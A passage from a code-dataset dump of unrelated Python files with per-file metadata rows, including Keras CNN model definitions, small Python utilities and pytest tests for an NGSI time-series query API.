with mock.patch('azure.cli.core.profiles._shared.AZURE_API_PROFILES', test_profile):
self.assertTrue(supported_api_version(ResourceType.MGMT_STORAGE, min_api='2020-01-01'))
@mock.patch('azure.cli.core._profile.CLOUD', Cloud('TestCloud', profile='2017-01-01-profile'))
def test_supported_api_version_invalid_rt_for_profile(self):
test_profile = {'2017-01-01-profile': {ResourceType.MGMT_STORAGE: '2020-10-10'}}
with mock.patch('azure.cli.core.profiles._shared.AZURE_API_PROFILES', test_profile):
with self.assertRaises(APIVersionException):
supported_api_version(ResourceType.MGMT_COMPUTE, min_api='2020-01-01')
if __name__ == '__main__':
unittest.main()
| 59.763889 | 106 | 0.691843 | 1,102 | 8,606 | 5.133394 | 0.087114 | 0.029698 | 0.070002 | 0.090154 | 0.896765 | 0.856461 | 0.848683 | 0.834541 | 0.83295 | 0.825703 | 0 | 0.06224 | 0.161748 | 8,606 | 143 | 107 | 60.181818 | 0.72193 | 0.071694 | 0 | 0.457143 | 0 | 0 | 0.267018 | 0.144541 | 0 | 0 | 0 | 0 | 0.2 | 1 | 0.2 | false | 0 | 0.047619 | 0 | 0.257143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d4042628cd1f1bdafc00b66126eccbcea3930690 | 127 | py | Python | condition.py | BernardoAguayoOrtega/CS50-s-Python-2020 | 66fc60d584220c81b03f4157f2da99a2b2910234 | [
"MIT"
] | null | null | null | condition.py | BernardoAguayoOrtega/CS50-s-Python-2020 | 66fc60d584220c81b03f4157f2da99a2b2910234 | [
"MIT"
] | null | null | null | condition.py | BernardoAguayoOrtega/CS50-s-Python-2020 | 66fc60d584220c81b03f4157f2da99a2b2910234 | [
"MIT"
] | null | null | null | n = int(input("Number: "))
if n > 0:
print("it's positive")
elif n < 0:
print("it's negative")
else:
print("it's zero") | 15.875 | 26 | 0.574803 | 23 | 127 | 3.173913 | 0.608696 | 0.287671 | 0.328767 | 0.246575 | 0.273973 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019802 | 0.204724 | 127 | 8 | 27 | 15.875 | 0.70297 | 0 | 0 | 0 | 0 | 0 | 0.335938 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.428571 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
d44f0647dc318829b504034dbaaf0ffb866074c3 | 29 | py | Python | grid/server/__init__.py | daviddemeij/Grid | 4ded37c437bf007ca021e00471dc4cd0651c8650 | [
"Apache-2.0"
] | null | null | null | grid/server/__init__.py | daviddemeij/Grid | 4ded37c437bf007ca021e00471dc4cd0651c8650 | [
"Apache-2.0"
] | null | null | null | grid/server/__init__.py | daviddemeij/Grid | 4ded37c437bf007ca021e00471dc4cd0651c8650 | [
"Apache-2.0"
] | null | null | null | from grid.server import grid
| 14.5 | 28 | 0.827586 | 5 | 29 | 4.8 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137931 | 29 | 1 | 29 | 29 | 0.96 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2e8a61d8cfdbdbeff919be4a0c8aed855be91a70 | 6,334 | py | Python | deep_nn.py | Matakov/Neural-Nets | 4175f1824a82018ae60da6d9fd3b4d02d90f44a1 | [
"MIT"
] | null | null | null | deep_nn.py | Matakov/Neural-Nets | 4175f1824a82018ae60da6d9fd3b4d02d90f44a1 | [
"MIT"
] | null | null | null | deep_nn.py | Matakov/Neural-Nets | 4175f1824a82018ae60da6d9fd3b4d02d90f44a1 | [
"MIT"
] | null | null | null | from __future__ import print_function
from keras.utils.data_utils import get_file
from keras.optimizers import Adam
from keras.models import Sequential
from keras.layers import Dense, Flatten
from keras.layers import Conv2D, MaxPooling2D,AveragePooling2D
from keras.layers import Input
from keras import backend as K
from keras.utils.conv_utils import convert_kernel
import tensorflow as tf
import warnings
from keras.utils.layer_utils import convert_all_kernels_in_model
TH_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_th_dim_ordering_th_kernels_notop.h5'
TF_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5'
def VGG16():
model = Sequential()
# 1
model.add(Conv2D(64, (3, 3), activation='relu', padding='same', name='block1_conv1', input_shape = (128, 128, 1)))
model.add(Conv2D(64, (3, 3), activation='relu', padding='same', name='block1_conv2'))
model.add(MaxPooling2D((2, 2), strides=(2, 2), name='block1_pool'))
# 2
model.add(Conv2D(128, (3, 3), activation='relu', padding='same', name='block2_conv1'))
model.add(Conv2D(128, (3, 3), activation='relu', padding='same', name='block2_conv2'))
model.add(MaxPooling2D((2, 2), strides=(2, 2), name='block2_pool'))
# 3
model.add(Conv2D(256, (3, 3), activation='relu', padding='same', name='block3_conv1'))
model.add(Conv2D(256, (3, 3), activation='relu', padding='same', name='block3_conv2'))
model.add(Conv2D(256, (3, 3), activation='relu', padding='same', name='block3_conv3'))
model.add(MaxPooling2D((2, 2), strides=(2, 2), name='block3_pool'))
# 4
model.add(Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv1'))
model.add(Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv2'))
model.add(Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv3'))
model.add(MaxPooling2D((2, 2), strides=(2, 2), name='block4_pool'))
# Block 5
model.add(Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv1'))
model.add(Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv2'))
model.add(Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv3'))
model.add(MaxPooling2D((2, 2), strides=(2, 2), name='block5_pool'))
# #Load Weights
# print('K.image_dim_ordering:', K.image_dim_ordering())
# if K.image_dim_ordering() == 'th':
# weights_path = get_file('vgg16_weights_th_dim_ordering_th_kernels_notop.h5',
# TH_WEIGHTS_PATH_NO_TOP,
# cache_subdir='models')
# model.load_weights(weights_path)
# if K.backend() == 'tensorflow':
# warnings.warn('You are using the TensorFlow backend, yet you '
# 'are using the Theano '
# 'image dimension ordering convention '
# '(`image_dim_ordering="th"`). '
# 'For best performance, set '
# '`image_dim_ordering="tf"` in '
# 'your Keras config '
# 'at ~/.keras/keras.json.')
# convert_all_kernels_in_model(model)
# else:
# weights_path = get_file('vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5',
# TF_WEIGHTS_PATH_NO_TOP,
# cache_subdir='models')
# model.load_weights(weights_path)
# if K.backend() == 'theano':
# convert_all_kernels_in_model(model)
# FC Block
model.add(Flatten(name='flatten'))
model.add(Dense(1024, activation='relu', name='fc1'))
model.add(Dense(1024, activation='relu', name='fc2'))
model.add(Dense(1, activation='linear', name='fc3'))
model.compile(loss='mean_squared_error', optimizer=Adam())
return model
def AntonioMax():
model = Sequential()
# 1
model.add(Conv2D(4, (3, 3), activation='relu', padding='same', name='block1_conv1', input_shape = (128, 128, 1)))
model.add(Conv2D(4, (3, 3), activation='relu', padding='same', name='block1_conv2'))
model.add(MaxPooling2D((2, 2), strides=(2, 2), name='block1_pool'))
# 2
model.add(Conv2D(16, (3, 3), activation='relu', padding='same', name='block2_conv1'))
model.add(Conv2D(16, (3, 3), activation='relu', padding='same', name='block2_conv2'))
model.add(MaxPooling2D((2, 2), strides=(2, 2), name='block2_pool'))
# 3
model.add(Conv2D(32, (3, 3), activation='relu', padding='same', name='block3_conv1'))
model.add(Conv2D(32, (3, 3), activation='relu', padding='same', name='block3_conv2'))
model.add(MaxPooling2D((2, 2), strides=(2, 2), name='block3_pool'))
# FC Block
model.add(Flatten(name='flatten'))
model.add(Dense(512, activation='relu', name='fc1'))
model.add(Dense(512, activation='relu', name='fc2'))
model.add(Dense(1, activation='linear', name='fc3'))
model.compile(loss='mean_squared_error', optimizer=Adam())
return model
def AntonioAvg():
model = Sequential()
# 1
model.add(Conv2D(4, (3, 3), activation='relu', padding='same', name='block1_conv1', input_shape = (128, 128, 1)))
model.add(Conv2D(4, (3, 3), activation='relu', padding='same', name='block1_conv2'))
model.add(AveragePooling2D((2, 2), strides=(2, 2), name='block1_pool'))
# 2
model.add(Conv2D(16, (3, 3), activation='relu', padding='same', name='block2_conv1'))
model.add(Conv2D(16, (3, 3), activation='relu', padding='same', name='block2_conv2'))
model.add(AveragePooling2D((2, 2), strides=(2, 2), name='block2_pool'))
# 3
model.add(Conv2D(32, (3, 3), activation='relu', padding='same', name='block3_conv1'))
model.add(Conv2D(32, (3, 3), activation='relu', padding='same', name='block3_conv2'))
model.add(AveragePooling2D((2, 2), strides=(2, 2), name='block3_pool'))
# FC Block
model.add(Flatten(name='flatten'))
model.add(Dense(512, activation='relu', name='fc1'))
model.add(Dense(512, activation='relu', name='fc2'))
model.add(Dense(1, activation='linear', name='fc3'))
model.compile(loss='mean_squared_error', optimizer=Adam())
return model
| 50.269841 | 148 | 0.64288 | 858 | 6,334 | 4.59324 | 0.142191 | 0.097437 | 0.08881 | 0.101497 | 0.821365 | 0.81426 | 0.786602 | 0.775945 | 0.77493 | 0.739406 | 0 | 0.064224 | 0.181402 | 6,334 | 125 | 149 | 50.672 | 0.695853 | 0.199242 | 0 | 0.5 | 0 | 0.027027 | 0.200119 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.040541 | false | 0 | 0.162162 | 0 | 0.243243 | 0.013514 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
cf14c8fef4a426a1b42137418c7ef90411cd1bff | 65 | py | Python | Scripts/_loadlib/utils/__init__.py | xuesoso/singleToxoplasmaSeq | 3dbd29b94fc484bacf3ff4cdbaf32c444f606451 | [
"MIT"
] | 1 | 2020-08-05T20:30:35.000Z | 2020-08-05T20:30:35.000Z | Scripts/_loadlib/utils/__init__.py | xuesoso/singleToxoplasmaSeq | 3dbd29b94fc484bacf3ff4cdbaf32c444f606451 | [
"MIT"
] | 2 | 2020-02-09T22:23:13.000Z | 2020-03-04T22:38:31.000Z | Scripts/_loadlib/utils/__init__.py | xuesoso/singleToxoplasmaSeq | 3dbd29b94fc484bacf3ff4cdbaf32c444f606451 | [
"MIT"
] | 2 | 2020-02-18T12:33:32.000Z | 2020-04-08T02:00:34.000Z | from . import sc_tools as sat
# from . import sc_utilities as ut
| 21.666667 | 34 | 0.753846 | 12 | 65 | 3.916667 | 0.666667 | 0.425532 | 0.510638 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 65 | 2 | 35 | 32.5 | 0.903846 | 0.492308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
cf2b9ff2537ab5c15cea1a0cd9d033cc597a5303 | 75 | py | Python | plasmapy/tests/__init__.py | haman80/PlasmaPy | 646f7ed52b89a1254be474fe54bdd672f7d27fb3 | [
"BSD-2-Clause",
"MIT",
"BSD-2-Clause-Patent",
"BSD-1-Clause",
"BSD-3-Clause"
] | null | null | null | plasmapy/tests/__init__.py | haman80/PlasmaPy | 646f7ed52b89a1254be474fe54bdd672f7d27fb3 | [
"BSD-2-Clause",
"MIT",
"BSD-2-Clause-Patent",
"BSD-1-Clause",
"BSD-3-Clause"
] | null | null | null | plasmapy/tests/__init__.py | haman80/PlasmaPy | 646f7ed52b89a1254be474fe54bdd672f7d27fb3 | [
"BSD-2-Clause",
"MIT",
"BSD-2-Clause-Patent",
"BSD-1-Clause",
"BSD-3-Clause"
] | null | null | null | """PlasmaPy tests and test helpers."""
from plasmapy.tests import helpers
| 18.75 | 38 | 0.76 | 10 | 75 | 5.7 | 0.7 | 0.45614 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 75 | 3 | 39 | 25 | 0.876923 | 0.426667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
cf2dcb9f9599c16154cc900ca1ddda0b3dc1f96b | 90 | py | Python | 03_operadores_bitwise.py | Israeltalles/Codigos_ProgramacaoParaRedes | ee1bde0691af6efc6ad8e0f4805bab2cc9357bc7 | [
"Apache-2.0"
] | null | null | null | 03_operadores_bitwise.py | Israeltalles/Codigos_ProgramacaoParaRedes | ee1bde0691af6efc6ad8e0f4805bab2cc9357bc7 | [
"Apache-2.0"
] | null | null | null | 03_operadores_bitwise.py | Israeltalles/Codigos_ProgramacaoParaRedes | ee1bde0691af6efc6ad8e0f4805bab2cc9357bc7 | [
"Apache-2.0"
] | null | null | null | x=1
x << 2  # note: bare expression discards the result; use x = x << 2 to keep the shifted value
print(x)
print(x | 2)
print(x & 1)
y = 0b1000
print(y)
y=y>>3
# y = 0b0001
print(y)
| 8.181818 | 12 | 0.588889 | 23 | 90 | 2.304348 | 0.347826 | 0.339623 | 0.264151 | 0.301887 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.202703 | 0.177778 | 90 | 10 | 13 | 9 | 0.513514 | 0.088889 | 0 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.555556 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
cf380521ea764584994064ecb5df887de71dabe8 | 135 | py | Python | benedict/core/rename.py | next-franciscoalgaba/python-benedict | 81ff459304868327238c322a0a8a203d9d5d4314 | [
"MIT"
] | 365 | 2019-05-21T05:50:30.000Z | 2022-03-29T11:35:35.000Z | benedict/core/rename.py | next-franciscoalgaba/python-benedict | 81ff459304868327238c322a0a8a203d9d5d4314 | [
"MIT"
] | 78 | 2019-11-16T12:22:54.000Z | 2022-03-14T12:21:30.000Z | benedict/core/rename.py | next-franciscoalgaba/python-benedict | 81ff459304868327238c322a0a8a203d9d5d4314 | [
"MIT"
] | 26 | 2019-12-16T06:34:12.000Z | 2022-02-28T07:16:41.000Z | # -*- coding: utf-8 -*-
from benedict.core.move import move
def rename(d, key, key_new):
move(d, key, key_new, overwrite=False)
| 16.875 | 42 | 0.659259 | 22 | 135 | 3.954545 | 0.681818 | 0.091954 | 0.16092 | 0.229885 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009009 | 0.177778 | 135 | 7 | 43 | 19.285714 | 0.774775 | 0.155556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
cf45fe5edb31bfb360a64fa58a217cd125ce1f02 | 100 | py | Python | atpthings/__init__.py | atp-things/pkg-python-util | 7ce464e38b43a84b6c8bf176b882d71e55edc4fb | [
"MIT"
] | null | null | null | atpthings/__init__.py | atp-things/pkg-python-util | 7ce464e38b43a84b6c8bf176b882d71e55edc4fb | [
"MIT"
] | null | null | null | atpthings/__init__.py | atp-things/pkg-python-util | 7ce464e38b43a84b6c8bf176b882d71e55edc4fb | [
"MIT"
] | null | null | null | """
atpthings
=========
ATP Things python package
"""
from . import example123
from . import util
| 10 | 25 | 0.65 | 11 | 100 | 5.909091 | 0.818182 | 0.307692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036585 | 0.18 | 100 | 9 | 26 | 11.111111 | 0.756098 | 0.46 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
cf6747b89b78d13d1eb6418313ed7c8ea75e3484 | 150 | py | Python | cliva_fl/multiprocessing/__init__.py | DataManagementLab/thesis-fl_client-side_validation | 0f6a35d08966133e6a8c13a110b9307d91f2d9cb | [
"MIT"
] | null | null | null | cliva_fl/multiprocessing/__init__.py | DataManagementLab/thesis-fl_client-side_validation | 0f6a35d08966133e6a8c13a110b9307d91f2d9cb | [
"MIT"
] | null | null | null | cliva_fl/multiprocessing/__init__.py | DataManagementLab/thesis-fl_client-side_validation | 0f6a35d08966133e6a8c13a110b9307d91f2d9cb | [
"MIT"
] | null | null | null | from .core import start_validators, stop_validators
from .validation_process import validation_process
from .process_logger import get_process_logger
| 37.5 | 51 | 0.886667 | 20 | 150 | 6.3 | 0.5 | 0.269841 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086667 | 150 | 3 | 52 | 50 | 0.919708 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2b09c15c7c85566a726ac9fd465dab19fcc3e3fc | 16,296 | py | Python | src/reporter/tests/test_NTNE1A.py | cnoelle/ngsi-timeseries-api | 77ed420c0a7532bcc13d941c0402f457cc40407a | [
"MIT"
] | null | null | null | src/reporter/tests/test_NTNE1A.py | cnoelle/ngsi-timeseries-api | 77ed420c0a7532bcc13d941c0402f457cc40407a | [
"MIT"
] | null | null | null | src/reporter/tests/test_NTNE1A.py | cnoelle/ngsi-timeseries-api | 77ed420c0a7532bcc13d941c0402f457cc40407a | [
"MIT"
] | null | null | null | from conftest import QL_URL, crate_translator as translator
from reporter.tests.utils import insert_test_data
from datetime import datetime
import pytest
import requests
attr_name = 'temperature'
entity_type = "Room"
entity_id = "Room1"
entity_id_1 = "Room2"
n_days = 4
def query_url(values=False):
url = "{qlUrl}/attrs/{attrName}"
if values:
url += '/value'
return url.format(
qlUrl=QL_URL,
attrName=attr_name
)
@pytest.fixture()
def reporter_dataset(translator):
insert_test_data(translator, [entity_type], n_entities=1, index_size=4, entity_id=entity_id)
insert_test_data(translator, [entity_type], n_entities=1, index_size=4, entity_id=entity_id_1)
yield
def test_NTNE1A_defaults(reporter_dataset):
r = requests.get(query_url())
# Assert Results
assert r.status_code == 200, r.text
expected_temperatures = list(range(4))
expected_index = [
'1970-01-{:02}T00:00:00.000'.format(i+1) for i in expected_temperatures
]
expected_entities = [
{
'entityId': 'Room1',
'index': expected_index,
'values': expected_temperatures
},
{
'entityId': 'Room2',
'index': expected_index,
'values': expected_temperatures
}
]
expected_types = [
{
'entities': expected_entities,
'entityType': 'Room'
}
]
expected = {
'attrName': attr_name,
'types': expected_types
}
obtained = r.json()
assert obtained == expected
def test_NTNE1A_type(reporter_dataset):
# Query
query_params = {
'type': entity_type
}
r = requests.get(query_url(), params=query_params)
assert r.status_code == 200, r.text
expected_temperatures = list(range(4))
expected_index = [
'1970-01-{:02}T00:00:00.000'.format(i+1) for i in expected_temperatures
]
expected_entities = [
{
'entityId': 'Room1',
'index': expected_index,
'values': expected_temperatures
},
{
'entityId': 'Room2',
'index': expected_index,
'values': expected_temperatures
}
]
expected_types = [
{
'entities': expected_entities,
'entityType': 'Room'
}
]
expected = {
'attrName': attr_name,
'types': expected_types
}
obtained = r.json()
assert obtained == expected
def test_NTNE1A_one_entity(reporter_dataset):
# Query
query_params = {
'id': entity_id
}
r = requests.get(query_url(), params=query_params)
assert r.status_code == 200, r.text
obtained_data = r.json()
assert isinstance(obtained_data, dict)
expected_temperatures = list(range(4))
expected_index = [
'1970-01-{:02}T00:00:00.000'.format(i+1) for i in expected_temperatures
]
expected_entities = [
{
'entityId': 'Room1',
'index': expected_index,
'values': expected_temperatures
}
]
expected_types = [
{
'entities': expected_entities,
'entityType': 'Room'
}
]
expected = {
'attrName': attr_name,
'types': expected_types
}
obtained = r.json()
assert obtained == expected
def test_1TNENA_some_entities(reporter_dataset):
# Query
# Assert Results
entity_ids = "Room1, Room2"
query_params = {
'id': entity_ids
}
r = requests.get(query_url(), params=query_params)
assert r.status_code == 200, r.text
obtained_data = r.json()
assert isinstance(obtained_data, dict)
expected_temperatures = list(range(4))
expected_index = [
'1970-01-{:02}T00:00:00.000'.format(i+1) for i in expected_temperatures
]
expected_entities = [
{
'entityId': 'Room1',
'index': expected_index,
'values': expected_temperatures
},
{
'entityId': 'Room2',
'index': expected_index,
'values': expected_temperatures
}
]
expected_types = [
{
'entities': expected_entities,
'entityType': 'Room'
}
]
expected = {
'attrName': attr_name,
'types': expected_types
}
obtained = r.json()
assert obtained == expected
def test_NTNE1A_values_defaults(reporter_dataset):
# Query
query_params = {
'id': 'Room1,Room2,RoomNotValid', # -> validates to Room1,Room2.
}
r = requests.get(query_url(values=True), params=query_params)
assert r.status_code == 200, r.text
# Assert Results
expected_temperatures = list(range(4))
expected_index = [
'1970-01-{:02}T00:00:00.000'.format(i+1) for i in expected_temperatures
]
expected_entities = [
{
'entityId': 'Room1',
'index': expected_index,
'values': expected_temperatures
},
{
'entityId': 'Room2',
'index': expected_index,
'values': expected_temperatures
}
]
expected_types = [
{
'entities': expected_entities,
'entityType': 'Room'
}
]
expected = {
#'values': expected_entities,
#'attrName': attr_name,
'values': expected_types
#'types': expected_types
}
obtained = r.json()
assert obtained == expected
def test_weird_ids(reporter_dataset):
"""
Invalid ids are ignored (provided at least one is valid to avoid 404).
Empty values are ignored.
Order of ids is preserved in response (e.g., Room1 first, Room0 later)
"""
query_params = {
'id': 'Room1,RoomNotValid,Room2,', # -> validates to Room2,Room1.
}
r = requests.get(query_url(), params=query_params)
assert r.status_code == 200, r.text
expected_temperatures = list(range(n_days))
expected_index = [
'1970-01-{:02}T00:00:00.000'.format(i+1) for i in expected_temperatures
]
expected_entities = [
{
'entityId': 'Room1',
'index': expected_index,
'values': expected_temperatures
},
{
'entityId': 'Room2',
'index': expected_index,
'values': expected_temperatures
}
]
expected_types = [
{
'entities': expected_entities,
'entityType': 'Room'
}
]
expected = {
'attrName': attr_name,
'types': expected_types
}
obtained = r.json()
assert obtained == expected
def test_NTNE1A_fromDate_toDate(reporter_dataset):
# Query
query_params = {
'types': 'entity_type',
'fromDate': "1970-01-01T00:00:00",
'toDate': "1970-01-04T00:00:00"
}
r = requests.get(query_url(), params=query_params)
assert r.status_code == 200, r.text
obtained = r.json()
assert isinstance(obtained, dict)
expected_temperatures = list(range(4))
expected_index = [
'1970-01-{:02}T00:00:00.000'.format(i+1) for i in expected_temperatures
]
expected_entities = [
{
'entityId': 'Room1',
'index': expected_index,
'values': expected_temperatures
},
{
'entityId': 'Room2',
'index': expected_index,
'values': expected_temperatures
}
]
expected_types = [
{
'entities': expected_entities,
'entityType': 'Room'
}
]
expected = {
'attrName': attr_name,
'types': expected_types,
}
obtained = r.json()
assert obtained == expected
def test_NTNE1A_fromDate_toDate_with_quotes(reporter_dataset):
# Query
query_params = {
'types': 'entity_type',
'fromDate': "1970-01-01T00:00:00",
'toDate': "1970-01-04T00:00:00"
}
r = requests.get(query_url(), params=query_params)
assert r.status_code == 200, r.text
obtained = r.json()
assert isinstance(obtained, dict)
expected_temperatures = list(range(4))
expected_index = [
'1970-01-{:02}T00:00:00.000'.format(i+1) for i in expected_temperatures
]
expected_entities = [
{
'entityId': 'Room1',
'index': expected_index,
'values': expected_temperatures
},
{
'entityId': 'Room2',
'index': expected_index,
'values': expected_temperatures
}
]
expected_types = [
{
'entities': expected_entities,
'entityType': 'Room'
}
]
expected = {
'attrName': attr_name,
'types': expected_types,
}
obtained = r.json()
assert obtained == expected
def test_NTNE1A_limit(reporter_dataset):
# Query
query_params = {
'limit': 10
}
r = requests.get(query_url(), params=query_params)
assert r.status_code == 200, r.text
obtained = r.json()
assert isinstance(obtained, dict)
expected_temperatures = list(range(4))
expected_index = [
'1970-01-{:02}T00:00:00.000'.format(i+1) for i in expected_temperatures
]
expected_entities = [
{
'entityId': 'Room1',
'index': expected_index,
'values': expected_temperatures
},
{
'entityId': 'Room2',
'index': expected_index,
'values': expected_temperatures
}
]
expected_types = [
{
'entities': expected_entities,
'entityType': 'Room'
}
]
expected = {
'attrName': attr_name,
'types': expected_types,
}
obtained = r.json()
assert obtained == expected
def test_NTNE1A_combined(reporter_dataset):
# Query
query_params = {
'type': entity_type,
'fromDate': "1970-01-01T00:00:00",
'toDate': "1970-01-03T00:00:00",
'limit': 10,
}
r = requests.get(query_url(), params=query_params)
assert r.status_code == 200, r.text
obtained = r.json()
assert isinstance(obtained, dict)
expected_temperatures = list(range(3))
expected_index = [
'1970-01-{:02}T00:00:00.000'.format(i+1) for i in expected_temperatures
]
expected_entities = [
{
'entityId': 'Room1',
'index': expected_index,
'values': expected_temperatures
},
{
'entityId': 'Room2',
'index': expected_index,
'values': expected_temperatures
}
]
expected_types = [
{
'entities': expected_entities,
'entityType': 'Room'
}
]
expected = {
'attrName': attr_name,
'types': expected_types,
}
obtained = r.json()
assert obtained == expected
@pytest.mark.parametrize("aggr_period, exp_index, ins_period", [
("day", ['1970-01-01T00:00:00.000',
'1970-01-02T00:00:00.000',
'1970-01-03T00:00:00.000'], "hour"),
("hour", ['1970-01-01T00:00:00.000',
'1970-01-01T01:00:00.000',
'1970-01-01T02:00:00.000'], "minute"),
("minute", ['1970-01-01T00:00:00.000',
'1970-01-01T00:01:00.000',
'1970-01-01T00:02:00.000'], "second"),
])
def test_NTNE1A_aggrPeriod(translator, aggr_period, exp_index, ins_period):
# Custom index to test aggrPeriod
for i in exp_index:
base = datetime.strptime(i, "%Y-%m-%dT%H:%M:%S.%f")
insert_test_data(translator,
[entity_type],
index_size=5,
index_base=base,
index_period=ins_period)
# aggrPeriod needs aggrMethod
query_params = {
'aggrPeriod': aggr_period,
}
r = requests.get(query_url(), params=query_params)
assert r.status_code == 400, r.text
# Check aggregation with aggrPeriod
query_params = {
'attrs': 'temperature',
'aggrMethod': 'sum',
'aggrPeriod': aggr_period,
}
r = requests.get(query_url(), params=query_params)
assert r.status_code == 200, r.text
expected_temperatures = 0 + 1 + 2 + 3 + 4
# Assert
obtained = r.json()
expected_entities = [
{
'entityId': 'Room0',
'index': exp_index,
'values': [expected_temperatures, expected_temperatures, expected_temperatures]
}
]
expected_types = [
{
'entities': expected_entities,
'entityType': 'Room'
}
]
expected = {
'attrName': attr_name,
'types': expected_types,
}
obtained = r.json()
assert obtained == expected
def test_not_found():
query_params = {
'id': 'RoomNotValid'
}
r = requests.get(query_url(), params=query_params)
assert r.status_code == 404, r.text
assert r.json() == {
"error": "Not Found",
"description": "No records were found for such query."
}
def test_NTNE1A_aggrScope(reporter_dataset):
# Notify users when not yet implemented
query_params = {
'aggrMethod': 'avg',
'aggrScope': 'global',
}
r = requests.get(query_url(), params=query_params)
assert r.status_code == 501, r.text
def test_aggregation_is_per_instance(translator):
t = 'Room'
insert_test_data(translator, [t], entity_id='Room1', index_size=3)
query_params = {
'attrs': 'temperature',
'id': 'Room1',
'aggrMethod': 'sum'
}
r = requests.get(query_url(), params=query_params)
